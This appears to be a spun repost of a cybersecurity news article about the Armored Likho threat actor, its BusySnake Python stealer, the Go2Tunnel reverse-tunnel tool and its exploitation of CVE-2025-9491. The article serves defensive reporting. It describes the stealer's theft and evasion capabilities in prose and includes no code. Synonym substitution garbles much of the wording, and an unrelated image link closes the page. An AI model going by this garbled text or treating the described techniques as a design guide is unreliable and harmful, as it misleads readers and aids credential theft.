A beforehand undocumented menace actor often known as Armored Likho has been attributed to cyber assaults concentrating on authorities companies and the electrical energy sector throughout Russia, Brazil, and Kazakhstan.
“Armored Likho blends financially motivated campaigns concentrating on personal people with focused cyber espionage geared toward organizations,” Kaspersky mentioned in a technical evaluation printed immediately. “Their toolkit options obfuscated, modular RATs and infostealers particularly engineered to bypass dynamic evaluation.”
The assaults are additionally characterised by means of instruments like Go2Tunnel for distant entry and community tunneling. The big variety of instruments in its arsenal permits the menace actor to take care of persistent entry to compromised hosts, steal credentials and delicate information, and dynamically ship modules tailor-made to the sufferer’s profile.
The Russian cybersecurity vendor mentioned Armored Likho shares potential overlaps with a menace cluster tracked by BI.ZONE beneath the moniker Eagle Werewolf, which has been energetic since Could 2023. The hacking group has a observe document of concentrating on authorities and protection organizations, particularly these concerned in UAV improvement and manufacturing, utilizing droppers, distant entry Trojans (RATs), and utilities for establishing SSH tunnels.
“Menace actors could use compromised Telegram channels to distribute the malware,” BI.ZONE notes in its description of the menace actor. “Whereas the group’s major motivation is cyber-espionage, campaigns geared toward stealing funds from victims have additionally been recorded.”
Again in February 2026, Eagle Werewolf was noticed compromising a drone‑centered Telegram channel to distribute AquilaRAT by way of a Rust dropper that masquerades as a guidelines for Starlink machine activation. Additionally put to make use of within the assaults is Go2Tunnel to determine a reverse SSH tunnel to a command-and-control (C2) server utilizing a non-public key.
The most recent findings present that the menace actor has additionally employed a beforehand unreported Python-based info stealer named BusySnake Stealer concentrating on Home windows techniques, one model of which features a module for stealing cookies from net browsers. The precise origins of Armored Likho stay unknown.
The start line of the assault chain is a spear-phishing e mail that makes use of lures associated to official authorities notices or social packages to distribute a RAR archive containing EXE binaries that function droppers for extra payloads retrieved from a GitHub repository, together with the stealer payload.
The dropper malware additionally creates two Visible Primary Script (VBScript) recordsdata which can be chargeable for erasing traces of the preliminary execution in addition to launching the stealer by way of a scheduled job.
Alternate chains make the most of Home windows shortcuts (LNK) as a substitute of EXE payloads that weaponize a now-patched vulnerability associated to how Home windows handles such recordsdata, leading to distant code execution. The flaw, tracked as CVE-2025-9491 (aka ZDI-CAN-25373), was addressed by Microsoft as a part of its Patch Tuesday updates for November 2025. Proof unearthed by Pattern Micro final 12 months revealed that the shortcoming had been weaponized by a dozen hacking teams since 2017.
Within the assault chain documented by Kaspersky, the shortcut vulnerability is abused to set off the execution of an obfuscated PowerShell command that launches a loader chargeable for displaying a decoy doc, whereas getting ready the atmosphere for the execution of the Python stealer. The malware then establishes persistence by means of a mixture of a VBScript file and a scheduled job, as earlier than.
The stealer, known as BusySnake, implements a number of evasion strategies to complicate static evaluation and sidestep detection. Its major aim is to determine communication with a C2 server after which await incoming directions. It additionally helps the next performance –
- Steal information from the system clipboard.
- Enumerate recordsdata throughout the system and log their metadata in a neighborhood database.
- Add consumer paperwork to the C2 server.
- Seize screenshots and stage them in a neighborhood listing.
- Archive captured screenshots and take away beforehand created archives from the disk.
- Stop a number of situations of the stealer from operating concurrently on the contaminated host.
- Guarantee persistence by checking if the scheduled job exists, and if not, drop a VBScript to register a brand new scheduled job.
Moreover, the instructions issued by the C2 server permit it to take screenshots at a delegated interval, log keystroke information, collect cryptocurrency pockets recordsdata with a JSON extension, gather Telegram session and credential information, set up a reverse SSH tunnel utilizing Go2Tunnel, set up RustDesk, and extract cookies from Mozilla Firefox and Chromium-based browsers, together with passwords.
If RustDesk is already put in on the machine, the open-source distant desktop software program is began, and the sufferer is prompted to enter their credentials, following which the stealer grabs a screenshot of the credentials and exfiltrates it to the C2 server.
“The malware dynamically decrypts its bytecode solely on the actual second a operate is known as, re-encrypting the information instantly afterward,” Kaspersky mentioned. “Moreover, the malware runs within the background with out spawning a console window, as indicated by its PYW file extension.”
Kaspersky mentioned it additionally recognized a more moderen model of BusySnake that iterates upon the predecessor’s architectural design to incorporate a brand new task-management framework to deal with incoming C2 instructions and dynamically assign them operational statuses, comparable to SCHEDULED, IN_PROGRESS, SUCCEEDED, or FAILED, for improved reporting again to the server.
The menace actor’s ties to Eagle Werewolf additionally stem from overlaps between AquilaRAT and BusySnake Stealer, notably within the method each malware households obtain duties from the C2 server, register persistence by way of scheduled duties, and make the most of related endpoints for C2 communications.
There are additionally indicators that the first-stage payloads comprising loaders and stagers had been doubtless generated with help from synthetic intelligence (AI) instruments, given the presence of redundant feedback and code blocks.
“This marketing campaign highlights a number of concurrent tendencies: the rising technical maturity of Armored Likho, software polymorphism, and a shift towards extra complicated schemes geared toward bypassing safety options – starting from Python supply code obfuscation to embedding community mechanisms instantly into the malware code,” Kaspersky mentioned.
“In parallel, the group is aggressively refining and modifying its core toolkit. Whereas Go2Tunnel beforehand operated as a standalone utility, its reverse-tunneling performance has now been built-in instantly into the stealer as a built-in function that ingests parameters from the C2 server.”






![How creators and entrepreneurs are utilizing AI to hurry up & succeed [data]](https://blog.aimactgrow.com/wp-content/uploads/2025/06/Untitled20design-Apr-07-2023-08-24-35-4586-PM-120x86.png)




